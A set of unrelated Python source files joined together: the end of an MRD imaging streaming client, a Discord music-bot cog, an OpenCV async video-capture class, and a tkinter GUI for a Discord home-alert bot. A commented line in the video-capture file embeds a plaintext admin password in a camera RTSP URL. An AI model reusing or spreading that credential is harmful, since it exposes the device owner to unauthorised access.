if args.send_waveforms:
logging.info("Sending waveform data")
logging.info("Found %d waveforms", dset.number_of_waveforms())
for idx in range(0, dset.number_of_waveforms()):
wav = dset.read_waveform(idx)
try:
connection.send_waveform(wav)
except:
logging.error('Failed to send waveform %d' % idx)
else:
logging.info("Waveform data present, but send-waveforms option turned off")
# --------------- Send raw data ----------------------
if isRaw:
logging.info("Starting raw data session")
logging.info("Found %d raw data readouts", dset.number_of_acquisitions())
for idx in range(dset.number_of_acquisitions()):
acq = dset.read_acquisition(idx)
try:
connection.send_acquisition(acq)
except:
logging.error('Failed to send acquisition %d' % idx)
# --------------- Send image data ----------------------
else:
logging.info("Starting image data session")
for group in groups:
if ( (group == 'config') or (group == 'config_file') or (group == 'xml') ):
logging.info("Skipping group %s", group)
continue
logging.info("Reading images from '/" + args.in_group + "/" + group + "'")
for imgNum in range(0, dset.number_of_images(group)):
image = dset.read_image(group, imgNum)
if not isinstance(image.attribute_string, str):
image.attribute_string = image.attribute_string.decode('utf-8')
logging.debug("Sending image %d of %d", imgNum, dset.number_of_images(group)-1)
connection.send_image(image)
dset.close()
connection.send_close()
# Wait for incoming data and cleanup
logging.debug("Waiting for threads to finish")
process.join()
sock.close()
logging.info("Socket closed (writer)")
# Save a copy of the MRD XML header now that the connection thread is finished with the file
logging.debug("Writing MRD metadata to file")
dset = ismrmrd.Dataset(args.outfile, args.out_group)
dset.write_xml_header(bytes(xml_header, 'utf-8'))
dset.close()
logging.info("---------------------- Summary ----------------------")
logging.info("Sent %4d acquisitions | Received %4d acquisitions", connection.sentAcqs, recvWaveforms.value)
logging.info("Sent %4d images | Received %4d images", connection.sentImages, recvImages.value)
logging.info("Sent %4d waveforms | Received %4d waveforms", connection.sentWaveforms, recvWaveforms.value)
logging.info("Session complete")
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Example client for MRD streaming format',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('filename', help='Input file')
parser.add_argument('-a', '--address', help='Address (hostname) of MRD server')
parser.add_argument('-p', '--port', type=int, help='Port')
parser.add_argument('-o', '--outfile', help='Output file')
parser.add_argument('-g', '--in-group', help='Input data group')
parser.add_argument('-G', '--out-group', help='Output group name')
parser.add_argument('-c', '--config', help='Remote configuration file')
parser.add_argument('-C', '--config-local', help='Local configuration file')
parser.add_argument('-w', '--send-waveforms', action='store_true', help='Send waveform (physio) data')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose mode')
parser.add_argument('-l', '--logfile', type=str, help='Path to log file')
parser.set_defaults(**defaults)
args = parser.parse_args()
if args.logfile:
print("Logging to file: ", args.logfile)
logging.basicConfig(filename=args.logfile, format='%(asctime)s - %(message)s', level=logging.WARNING)
logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
else:
print("No logfile provided")
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.WARNING)
if args.verbose:
logging.root.setLevel(logging.DEBUG)
else:
logging.root.setLevel(logging.INFO)
main(args)
|
music.py
|
#!/usr/bin/python
'''
Copyright 2021 fantoro
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from discord.ext import commands
import youtube_dl as ytdl
import discord, threading
async def is_in_voice_channel(ctx):
return ctx.author.voice.channel != None
class Music(commands.Cog):
def __init__(self, bot):
self.bot = bot
def stoppedPlaying(self, exception):
print("Stopped playback")
for vc in self.bot.voice_clients:
if not vc.is_playing():
self.bot.loop.create_task(vc.disconnect())
def PlayYtdl(self, args, ctx, ytdl_opts, vc):
with ctx.typing():
with ytdl.YoutubeDL(ytdl_opts) as ydl:
vid = ydl.extract_info(args)
if 'entries' in vid:
vid = vid['entries'][0]
print(vid)
audio = discord.FFmpegOpusAudio("./cache/{0}.opus".format(vid["id"]))
print("Playing {0}".format(vid["title"]))
vc.play(audio, after=self.stoppedPlaying)
response = discord.Embed(title="play")
response.add_field(name="Now playing", value=f"[{vid['title']}]({vid['webpage_url']})")
self.bot.loop.create_task(ctx.send(embed=response))
@commands.command(description="Plays an audio file")
@commands.guild_only()
@commands.check(is_in_voice_channel)
async def play(self, ctx, *, args):
if ctx.guild.me.voice == None or ctx.guild.me.voice.channel != ctx.author.voice.channel:
await ctx.author.voice.channel.connect()
vc = ctx.guild.voice_client
if vc.is_playing():
response = discord.Embed(title="play")
response.add_field(name="Already Playing", value="The bot is already playing something")
await ctx.send(embed=response)
return
response = discord.Embed(title="play")
response.add_field(name="Searching...", value=args)
await ctx.send(embed=response)
ytdl_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'opus',
'preferredquality': '128'
}],
'default_search': 'ytsearch',
'noplaylist': True,
# 'download_archive': './cache/files.txt',
'outtmpl': './cache/%(id)s.opus'
}
t = threading.Thread(target=self.PlayYtdl, args=(args,ctx,ytdl_opts,vc))
t.start()
def setup(bot):
print("Loading Music")
bot.add_cog(Music(bot))
def teardown(bot):
print("Unloading Music")
bot.remove_cog("Music")
|
videocaptureasync.py
|
# file: videocaptureasync.py
import threading
import cv2
from time import sleep
import copy
class VideoCaptureAsync:
def __init__(self, width=2688, height=1520):
#self.src = "/home/docout/Desktop/Exportación de ACC - 2019-07-09 23.05.46.avi"
#self.src = "rtsp://admin:DocoutBolivia@192.168.1.64:554/Streaming/Channels/102/"
# self.src = "/home/docout/Desktop/Exportación de ACC - 2019-07-09 23.05.46.avi"
#self.src = '/home/nubol23/Videos/Exportación de ACC - 2019-07-09 23.05.46.avi'
self.src = '/home/docout/Desktop/importante_battleship/Exportación de ACC - 2019-07-09 23.05.46.avi'
#self.src = "video.mp4"
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
print('[!] Asynchroneous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
sleep(0.03)
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def isOpened(self):
return self.cap.isOpened()
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
|
HomeAlertDiscord.py
|
#!/usr/bin/python3
# GUI libraries
import tkinter as tk
import tkinter.ttk as ttk
from PIL import Image, ImageTk, ImageOps
# Discord bot and other libraries
import discord, dotenv
from discord.ext import commands
# System libraries
import os, threading
# Math libraries
from sympy import var, Eq, solve
x = var("x")
__version__ = 1.0
__author__ = "QuentiumYT"
__filename__ = "HomeAlertDiscord"
# ANCHOR Variables declaration
is_bot_enabled = True
is_windows = os.name == "nt"
if is_bot_enabled:
dotenv.load_dotenv(".env")
bot_token = os.environ.get("TOKEN")
user_list = os.environ.get("USER_LIST").split(".")
client = commands.Bot(command_prefix="!")
# Using a 480x320 monitor on the Raspberry Pi
# (use this resolution on windows and fullscreen in RPi)
w_width = 480
w_height = 320
# Equation for exponential slider
equation = 0.1 * x**3 - 0.5 * x**2 + x
# Final variables for notification
f_desc = f_duration = f_when = f_priority = None
def usepic(pic, size):
"""
Returns a PhotoImage Object of a picture path with the size entered.
>>> usepic("image.png", 80)
"""
close_pic = Image.open(pic)
close_pic2 = close_pic.resize((size, size), Image.ANTIALIAS)
return ImageTk.PhotoImage(close_pic2)
# ANCHOR Tooltip class
class Tooltip:
"""
Creates a tooltip for a given widget as the mouse goes on it.
>>> button = Button(root)
>>> Tooltip(button, text="Tooltip info", bg="#FFFFFF", pad=(5,3,5,3), waittime=400, wraplength=250)
"""
def __init__(self, widget, *, text="Tooltip info", bg="#FFFFFF", pad=(5, 3, 5, 3), waittime=400, wraplength=250):
self.waittime = waittime
self.wraplength = wraplength
self.widget = widget
self.text = text
self.widget.bind("<Enter>", self.onEnter)
self.widget.bind("<Leave>", self.onLeave)
self.widget.bind("<ButtonPress>", self.onLeave)
self.bg = bg
self.pad = pad
self.id = None
self.tw = None
def onEnter(self, event=None):
self.schedule()
def onLeave(self, event=None):
self.unschedule()
self.hide()
def schedule(self):
self.unschedule()
self.id = self.widget.after(self.waittime, self.show)
def unschedule(self):
id_ = self.id
self.id = None
if id_:
self.widget.after_cancel(id_)
def show(self):
# Calculate position on widget enter
def tip_pos_calculator(widget, label, *, tip_delta=(10, 5), pad=(5, 3, 5, 3)):
w = widget
s_width, s_height = w.winfo_screenwidth(), w.winfo_screenheight()
width, height = (pad[0] + label.winfo_reqwidth() + pad[2], pad[1] + label.winfo_reqheight() + pad[3])
mouse_x, mouse_y = w.winfo_pointerxy()
x1, y1 = mouse_x + tip_delta[0], mouse_y + tip_delta[1]
x2, y2 = x1 + width, y1 + height
x_delta = x2 - s_width
if x_delta < 0:
x_delta = 0
y_delta = y2 - s_height
if y_delta < 0:
y_delta = 0
offscreen = (x_delta, y_delta) != (0, 0)
if offscreen:
if x_delta:
x1 = mouse_x - tip_delta[0] - width
if y_delta:
y1 = mouse_y - tip_delta[1] - height
offscreen_again = y1 < 0
if offscreen_again:
y1 = 0
return x1, y1
bg = self.bg
pad = self.pad
widget = self.widget
self.tw = tk.Toplevel(widget)
# Leaves only the label and removes the app window
self.tw.wm_overrideredirect(True)
win = ttk.Frame(self.tw, borderwidth=0)
label = ttk.Label(win, text=self.text, justify="left", background=bg, relief="solid", borderwidth=0, wraplength=self.wraplength)
label.grid(padx=(pad[0], pad[2]), pady=(pad[1], pad[3]), sticky="nsew")
win.grid()
x, y = tip_pos_calculator(widget, label)
self.tw.wm_geometry("+%d+%d" % (x, y))
def hide(self):
tw = self.tw
if tw:
tw.destroy()
self.tw = None
# ANCHOR Slider class
class Slider(tk.Frame):
def __init__(self, parent=None, from_=0, to_=100, change=None):
tk.Frame.__init__(self, parent)
self.change = change
self.result = 0
self.slider_width = 50
self.slider_height = 20
self.img_idle = Image.open("img/slider_idle.png")
self.img_slider_idle = ImageTk.PhotoImage(self.img_idle)
self.img_active = Image.open("img/slider_active.png")
self.img_slider_active = ImageTk.PhotoImage(self.img_active)
self.style = ttk.Style(self)
if not "custom.Horizontal.Scale.slider" in self.style.element_names():
self.style.element_create("custom.Horizontal.Scale.slider", "image", self.img_slider_idle, ("active", self.img_slider_active))
self.style.layout("custom.Horizontal.TScale", [("Horizontal.Scale.trough", {"sticky": "nswe", "children": [("custom.Horizontal.Scale.slider", {"side": "left"})]})])
self.style.configure("custom.Horizontal.TScale", background="lightgray")
self.slide = ttk.Scale(self, orient="horizontal", command=self.set_exp, length=200, from_=from_, to_=to_, style="custom.Horizontal.TScale")
self.slide.pack(side="right", expand=1, fill="x")
self.slide.configure(takefocus=0)
if not self.change:
self.text = tk.Label(self)
self.text.pack(side="top", fill="both")
def configure(self, variable):
self.slide.set(variable.get())
def update(self, variable):
self.variable = str(variable) + " minutes"
self.change.set(self.variable)
def set_log(self, val):
self.unimap = {"1": u"\u00b9", "2": u"\u00b2", "3": u"\u00b3",
"4": u"\u2074", "5": u"\u2075", "6": u"\u2076",
"7": u"\u2077", "8": u"\u2078", "9": u"\u2079"}
self.val = int(float(val))
self.result = 10**self.val
if self.change:
self.update(round(self.result, 2))
else:
self.text.configure(text="10%s" % (self.unimap[str(self.val)]))
def set_exp(self, val):
self.val = val
self.result = float(equation.subs(x, self.val))
if self.change:
self.update(round(self.result, 2))
else:
self.text.configure(text=str(round(self.result, 2)))
# ANCHOR Main class
class Main:
"""
Main selection window
>>> root = Tk()
>>> Main(root)
"""
def __init__(self, master):
self.master = master
self.font = "-family {Shentox 12} -size 12 -weight bold"
self.master.title("HomeAlertDiscord - Main")
self.master.grab_set()
self.master.focus()
self.master.update_idletasks()
self.master.protocol("WM_DELETE_WINDOW", self.close)
self.x = (self.master.winfo_screenwidth() - w_width) // 2
self.y = (self.master.winfo_screenheight() - w_height) // 2
if is_windows:
self.master.geometry("{}x{}+{}+{}".format(w_width, w_height, self.x, self.y))
self.master.iconbitmap("img/HomeAlertDiscord.ico")
else:
self.master.overrideredirect(True)
self.master.overrideredirect(False)
self.master.attributes("-fullscreen", True)
self.img = tk.PhotoImage(file="img/HomeAlertDiscord.png")
self.master.call("wm", "iconphoto", self.master._w, self.img)
self.master.bind("<F11>", lambda event: self.master.attributes("-fullscreen", not self.master.attributes("-fullscreen")))
self.master.bind("<Escape>", lambda event: self.close())
self.master.resizable(width=False, height=False)
self.pic_background = Image.open("img/clock_background.jpg")
self.pic_background = ImageOps.fit(self.pic_background, (self.x, self.y))
self.img = ImageTk.PhotoImage(self.pic_background)
self.background = tk.Label(self.master)
self.background.configure(image=self.img)
self.background.place(relx=0, rely=0, relheight=1, relwidth=1)
self.quit_btn = ttk.Button(self.master)
self.quit_btn.place(relx=0.0, rely=0.0, height=25, width=25)
self.quit_btn.configure(takefocus=0)
self.quit_btn.configure(cursor="tcross")
self.pic_close = usepic("img/deny.png", 15)
self.quit_btn.configure(image=self.pic_close)
self.quit_btn.configure(command=self.close)
Tooltip(self.quit_btn, text="Exit", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.info_btn = ttk.Button(self.master)
self.info_btn.place(relx=0.947, rely=0.0, height=25, width=25)
self.info_btn.configure(takefocus=0)
self.info_btn.configure(cursor="plus")
self.pic_info = usepic("img/info.png", 15)
self.info_btn.configure(image=self.pic_info)
self.info_btn.configure(command=self.open_info)
Tooltip(self.info_btn, text="About", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.text_window = ttk.Label(self.master)
self.text_window.place(relx=0.292, rely=0.019, height=22, width=200)
self.text_window.configure(font=self.font)
self.text_window.configure(background="black")
self.text_window.configure(foreground="white")
self.text_window.configure(anchor="center")
self.text_window.configure(text="Select any activity")
self.eat_starter = ttk.Button(self.master)
self.eat_starter.place(relx=0.125, rely=0.156, height=85, width=85)
self.pic_starter = usepic("img/starter.png", 75)
self.eat_starter.configure(image=self.pic_starter)
self.eat_starter.configure(cursor="circle")
self.eat_starter.configure(command=lambda: self.button_action("eat an appetizer"))
Tooltip(self.eat_starter, text="Eat an appetizer", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.eat_meal = ttk.Button(self.master)
self.eat_meal.place(relx=0.417, rely=0.156, height=85, width=85)
self.pic_meal = usepic("img/meal.png", 75)
self.eat_meal.configure(image=self.pic_meal)
self.eat_meal.configure(cursor="circle")
self.eat_meal.configure(command=lambda: self.button_action("eat the meal", True))
Tooltip(self.eat_meal, text="Eat the meal", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.eat_dessert = ttk.Button(self.master)
self.eat_dessert.place(relx=0.708, rely=0.156, height=85, width=85)
self.pic_dessert = usepic("img/dessert.png", 75)
self.eat_dessert.configure(image=self.pic_dessert)
self.eat_dessert.configure(cursor="circle")
self.eat_dessert.configure(command=lambda: self.button_action("eat dessert"))
Tooltip(self.eat_dessert, text="Eat dessert", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.horizontal_sep = ttk.Separator(self.master)
self.horizontal_sep.place(relx=0.123, rely=0.488, relwidth=0.75)
self.watch_movie = ttk.Button(self.master)
self.watch_movie.place(relx=0.125, rely=0.563, height=85, width=85)
self.pic_movie = usepic("img/movie.png", 75)
self.watch_movie.configure(image=self.pic_movie)
self.watch_movie.configure(cursor="circle")
self.watch_movie.configure(command=lambda: self.button_action("watch a movie"))
Tooltip(self.watch_movie, text="Watch a movie", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.go_outside = ttk.Button(self.master)
self.go_outside.place(relx=0.417, rely=0.563, height=85, width=85)
self.pic_go = usepic("img/outside.png", 75)
self.go_outside.configure(image=self.pic_go)
self.go_outside.configure(cursor="circle")
self.go_outside.configure(command=lambda: self.button_action("go outside"))
Tooltip(self.go_outside, text="Go outside", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.go_leave = ttk.Button(self.master)
self.go_leave.place(relx=0.708, rely=0.563, height=85, width=85)
self.pic_leave = usepic("img/leave.png", 75)
self.go_leave.configure(image=self.pic_leave)
self.go_leave.configure(cursor="circle")
self.go_leave.configure(command=lambda: self.button_action("leave the house", True))
Tooltip(self.go_leave, text="Leave the house", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
def close(self):
if is_bot_enabled:
client.loop.create_task(client.close())
self.master.destroy()
def button_action(self, button_desc, important=False):
global f_desc, f_priority
f_desc = button_desc
f_priority = important
self.open_duration()
def open_duration(self):
self.duration_w = tk.Toplevel()
Time(self.duration_w, title="HomeAlertDiscord - Duration", w_count=1)
def open_info(self):
self.info_w = tk.Toplevel()
Info(self.info_w, title="HomeAlertDiscord - Informations")
# ANCHOR Time class
class Time:
"""
Time selector window
>>> top = Toplevel()
>>> Time(top, title="Toplevel title", w_count=1)
"""
def __init__(self, top, title, w_count):
self.top = top
self.w_count = w_count
self.title = title
self.font = "-family {Shentox 12} -size 12 -weight bold"
self.top.title(self.title)
self.top.grab_set()
self.top.focus()
self.top.update_idletasks()
self.x = (self.top.winfo_screenwidth() - w_width) // 2
self.y = (self.top.winfo_screenheight() - w_height) // 2
if is_windows:
self.top.geometry("{}x{}+{}+{}".format(w_width, w_height, self.x, self.y))
self.top.iconbitmap("img/HomeAlertDiscord.ico")
else:
self.top.overrideredirect(True)
self.top.overrideredirect(False)
self.top.attributes("-fullscreen", True)
self.img = tk.PhotoImage(file="img/HomeAlertDiscord.png")
self.top.tk.call("wm", "iconphoto", self.top._w, self.img)
self.top.bind("<F11>", lambda event: self.top.attributes("-fullscreen", not self.top.attributes("-fullscreen")))
self.top.bind("<Escape>", lambda event: self.close())
self.top.resizable(width=False, height=False)
self.pic_background = Image.open("img/clock_background.jpg")
self.pic_background = ImageOps.fit(self.pic_background, (self.x, self.y))
self.img = ImageTk.PhotoImage(self.pic_background)
self.background = tk.Label(self.top)
self.background.configure(image=self.img)
self.background.place(relx=0, rely=0, relheight=1, relwidth=1)
self.quit_btn = ttk.Button(self.top)
self.quit_btn.place(relx=0.0, rely=0.0, height=25, width=25)
self.quit_btn.configure(takefocus=0)
self.quit_btn.configure(cursor="tcross")
self.pic_close = usepic("img/deny.png", 15)
self.quit_btn.configure(image=self.pic_close)
self.quit_btn.configure(command=self.close)
Tooltip(self.quit_btn, text="Exit", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.info_btn = ttk.Button(self.top)
self.info_btn.place(relx=0.947, rely=0.0, height=25, width=25)
self.info_btn.configure(takefocus=0)
self.info_btn.configure(cursor="question_arrow")
self.pic_info = usepic("img/info.png", 15)
self.info_btn.configure(image=self.pic_info)
self.info_btn.configure(command=self.open_info)
Tooltip(self.info_btn, text="About", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.text_window = ttk.Label(self.top)
self.text_window.place(relx=0.292, rely=0.019, height=22, width=200)
self.text_window.configure(font=self.font)
self.text_window.configure(background="black")
self.text_window.configure(foreground="white")
self.text_window.configure(anchor="center")
if self.w_count == 1:
self.text_window.configure(text="Select the duration")
else:
self.text_window.configure(text="Select the moment")
self.btn_0 = ttk.Button(self.top)
self.btn_0.place(relx=0.063, rely=0.12, height=60, width=60)
self.btn_0.configure(text="now")
self.btn_0.configure(cursor="circle")
self.btn_0.configure(command=lambda: self.button_time(self.btn_0.cget("text")))
Tooltip(self.btn_0, text="Now", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
if self.w_count == 1:
self.btn_0.configure(text="∞")
Tooltip(self.btn_0, text="Undefined", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_1 = ttk.Button(self.top)
self.btn_1.place(relx=0.25, rely=0.12, height=60, width=60)
self.btn_1.configure(text="1min")
self.btn_1.configure(cursor="circle")
self.btn_1.configure(command=lambda: self.button_time(self.btn_1.cget("text")))
Tooltip(self.btn_1, text="1 minute", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_3 = ttk.Button(self.top)
self.btn_3.place(relx=0.438, rely=0.12, height=60, width=60)
self.btn_3.configure(text="3min")
self.btn_3.configure(cursor="circle")
self.btn_3.configure(command=lambda: self.button_time(self.btn_3.cget("text")))
Tooltip(self.btn_3, text="3 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_5 = ttk.Button(self.top)
self.btn_5.place(relx=0.625, rely=0.12, height=60, width=60)
self.btn_5.configure(text="5min")
self.btn_5.configure(cursor="circle")
self.btn_5.configure(command=lambda: self.button_time(self.btn_5.cget("text")))
Tooltip(self.btn_5, text="5 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_15 = ttk.Button(self.top)
self.btn_15.place(relx=0.813, rely=0.12, height=60, width=60)
self.btn_15.configure(text="15min")
self.btn_15.configure(cursor="circle")
self.btn_15.configure(command=lambda: self.button_time(self.btn_15.cget("text")))
Tooltip(self.btn_15, text="15 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_20 = ttk.Button(self.top)
self.btn_20.place(relx=0.063, rely=0.364, height=60, width=60)
self.btn_20.configure(text="20min")
self.btn_20.configure(cursor="circle")
self.btn_20.configure(command=lambda: self.button_time(self.btn_20.cget("text")))
Tooltip(self.btn_20, text="20 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_30 = ttk.Button(self.top)
self.btn_30.place(relx=0.25, rely=0.364, height=60, width=60)
self.btn_30.configure(text="30min")
self.btn_30.configure(cursor="circle")
self.btn_30.configure(command=lambda: self.button_time(self.btn_30.cget("text")))
Tooltip(self.btn_30, text="30 minutes", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_60 = ttk.Button(self.top)
self.btn_60.place(relx=0.438, rely=0.364, height=60, width=60)
self.btn_60.configure(text="1h")
self.btn_60.configure(cursor="circle")
self.btn_60.configure(command=lambda: self.button_time(self.btn_60.cget("text")))
Tooltip(self.btn_60, text="1 hour", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_90 = ttk.Button(self.top)
self.btn_90.place(relx=0.625, rely=0.364, height=60, width=60)
self.btn_90.configure(text="1h30")
self.btn_90.configure(cursor="circle")
self.btn_90.configure(command=lambda: self.button_time(self.btn_90.cget("text")))
Tooltip(self.btn_90, text="1 hour and a half", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.btn_120 = ttk.Button(self.top)
self.btn_120.place(relx=0.813, rely=0.364, height=60, width=60)
self.btn_120.configure(text="2h")
self.btn_120.configure(cursor="circle")
self.btn_120.configure(command=lambda: self.button_time(self.btn_120.cget("text")))
Tooltip(self.btn_120, text="2 hours", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.horizontal_sep = ttk.Separator(self.top)
self.horizontal_sep.place(relx=0.063, rely=0.594, relwidth=0.875)
self.duration_txt = tk.StringVar()
self.duration_lenght = ttk.Entry(self.top)
self.duration_lenght.place(relx=0.229, rely=0.67, relheight=0.125, relwidth=0.333)
self.duration_lenght.configure(state="readonly")
self.duration_lenght.configure(takefocus=0)
self.duration_lenght.configure(textvariable=self.duration_txt)
self.duration_lenght.configure(cursor="star")
self.minus_btn = ttk.Button(self.top)
self.minus_btn.place(relx=0.104, rely=0.67, height=40, width=40)
self.minus_btn.configure(text="-")
self.minus_btn.configure(cursor="circle")
self.minus_btn.configure(command=lambda: self.slider_time(obj=self.duration_txt, action="remove"))
Tooltip(self.minus_btn, text="Decrease time by 1min", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.plus_btn = ttk.Button(self.top)
self.plus_btn.place(relx=0.604, rely=0.67, height=40, width=40)
self.plus_btn.configure(text="+")
self.plus_btn.configure(cursor="circle")
self.plus_btn.configure(command=lambda: self.slider_time(obj=self.duration_txt, action="add"))
Tooltip(self.plus_btn, text="Increase time by 1min", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.slider_val = tk.DoubleVar()
self.slider_val.set(5)
self.slider_duration = Slider(self.top, from_=0, to_=10, change=self.duration_txt)
self.slider_duration.place(relx=0.083, rely=0.88, relwidth=0.833, relheight=0.0, height=20, bordermode="ignore")
self.slider_duration.configure(variable=self.slider_val)
self.submit_btn = ttk.Button(top)
self.submit_btn.place(relx=0.771, rely=0.64, height=60, width=60)
self.submit_btn.configure(cursor="tcross")
self.pic_submit = usepic("img/accept.png", 50)
self.submit_btn.configure(image=self.pic_submit)
self.submit_btn.configure(command=lambda: self.button_time(self.duration_txt.get()))
Tooltip(self.submit_btn, text="Submit specific time", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.top.bind("<Return>", lambda x: self.button_time(self.duration_txt.get()))
self.top.bind("<minus>", lambda x: self.slider_time(obj=self.duration_txt, action="remove"))
self.top.bind("<plus>", lambda x: self.slider_time(obj=self.duration_txt, action="add"))
def close(self):
self.top.destroy()
def button_time(self, duration):
global f_duration, f_when
self.duration = duration
if "." in self.duration:
self.duration_raw = self.duration.replace(" minutes", "")
self.min = self.duration_raw.split(".")[0]
self.sec = self.duration_raw.split(".")[1]
self.duration = f"{self.min} minutes and {int(float(self.sec)*0.6)} seconds"
if self.w_count == 1:
f_duration = self.duration
self.open_when()
else:
f_when = self.duration
ProcessData()
self.close()
def slider_time(self, obj, action="add"):
self.action = action
self.current_time = obj.get()
self.exact_duration = float(self.current_time.split()[0])
if self.action == "add":
if self.exact_duration < 59:
self.new_time = self.exact_duration + 1
else:
self.new_time = 60
else:
if self.exact_duration > 0:
self.new_time = self.exact_duration - 1
else:
self.new_time = 0
self.duration_txt.set(str(self.new_time) + " minutes")
if self.new_time == 0.0:
self.new_time = 0
self.eq = Eq(equation, self.new_time)
self.result = solve(self.eq)[0]
self.slider_val.set(self.result)
self.slider_duration.configure(variable=self.slider_val)
def open_when(self):
self.w_when = tk.Toplevel()
Time(self.w_when, title="HomeAlertDiscord - When", w_count=2)
def open_info(self):
self.info_w = tk.Toplevel()
Info(self.info_w, title="HomeAlertDiscord - Informations")
# ANCHOR Info class
class Info:
"""
Information window
>>> top = Toplevel()
>>> Info(top, title="Toplevel title")
"""
def __init__(self, top, title):
self.top = top
self.title = title
self.font = "-family {Segoe UI} -size 14 -weight bold"
self.top.title(self.title)
self.top.grab_set()
self.top.focus()
self.top.update_idletasks()
self.x = (self.top.winfo_screenwidth() - w_width + 100) // 2
self.y = (self.top.winfo_screenheight() - w_height + 100) // 2
self.top.geometry("{}x{}+{}+{}".format(w_width - 100, w_height - 100, self.x, self.y))
if is_windows:
self.top.iconbitmap("img/HomeAlertDiscord.ico")
else:
self.img = tk.PhotoImage(file="img/HomeAlertDiscord.png")
self.top.tk.call("wm", "iconphoto", self.top._w, self.img)
self.top.bind("<F11>", lambda event: self.top.attributes("-fullscreen", not self.top.attributes("-fullscreen")))
self.top.bind("<Escape>", lambda event: self.close())
self.top.resizable(width=False, height=False)
self.quit_btn = ttk.Button(self.top)
self.quit_btn.place(relx=0.0, rely=0.0, height=25, width=25)
self.quit_btn.configure(takefocus=0)
self.quit_btn.configure(cursor="tcross")
self.pic_close = usepic("img/deny.png", 15)
self.quit_btn.configure(image=self.pic_close)
self.quit_btn.configure(command=self.close)
Tooltip(self.quit_btn, text="Exit", bg="#FFFFFF", pad=(0, 0, 0, 0), waittime="400", wraplength="0")
self.picture = ttk.Label(self.top)
self.picture.place(relx=0.053, rely=0.136, height=100, width=110)
self.pic_logo = usepic("img/HomeAlertDiscord.png", 98)
self.picture.configure(cursor="star")
self.picture.configure(image=self.pic_logo)
self.title = ttk.Label(self.top)
self.title.place(relx=0.395, rely=0.091, height=29, width=176)
self.title.configure(font=self.font)
self.title.configure(text="HomeAlertDiscord")
self.copyright = ttk.Label(self.top)
self.copyright.place(relx=0.395, rely=0.273, height=19, width=153)
self.copyright.configure(cursor="gobbler")
self.copyright.configure(text="Copyright © 2020 Quentin L")
self.TSeparator1 = ttk.Separator(self.top)
self.TSeparator1.place(relx=0.395, rely=0.409, relwidth=0.526)
self.support = ttk.Label(self.top)
self.support.place(relx=0.395, rely=0.455, height=19, width=123)
self.support.configure(text="Support and contact:")
self.website = ttk.Label(self.top)
self.website.place(relx=0.395, rely=0.591, height=19, width=133)
self.website.configure(foreground="blue")
self.website.configure(text="quentium.fr/en")
self.website.configure(cursor="hand2")
self.website.bind("<Button-1>", lambda x: self.open_link("https://quentium.fr/en/"))
self.github = ttk.Label(self.top)
self.github.place(relx=0.395, rely=0.682, height=19, width=183)
self.github.configure(foreground="blue")
self.github.configure(text="github.com/QuentiumYT")
self.github.configure(cursor="hand2")
self.github.bind("<Button-1>", lambda x: self.open_link("https://github.com/QuentiumYT/"))
self.TSeparator2 = ttk.Separator(self.top)
self.TSeparator2.place(relx=0.395, rely=0.818, relwidth=0.526)
self.paypal = ttk.Label(self.top)
self.paypal.place(relx=0.395, rely=0.864, height=19, width=93)
self.paypal.configure(foreground="blue")
self.paypal.configure(text="PayPal Donation")
